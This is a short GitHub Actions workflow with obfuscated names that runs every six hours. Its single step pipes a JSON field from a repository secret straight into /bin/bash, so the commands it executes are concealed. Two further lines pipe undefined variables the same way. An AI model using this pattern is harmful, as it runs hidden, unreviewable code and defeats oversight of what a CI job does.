name: chengengfuzi

on:
  workflow_dispatch:
  schedule:
    - cron: '49 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: chengengfuzi
        env:
          kleo31: ${{ secrets.kleo31 }}
        run: |
          echo $kleo31 | jq -r .znqid87557 | /bin/bash
          echo $j854 | jq -r .e731 | /bin/bash
          echo $stdsq52354 | jq -r .cd51562 | /bin/bash

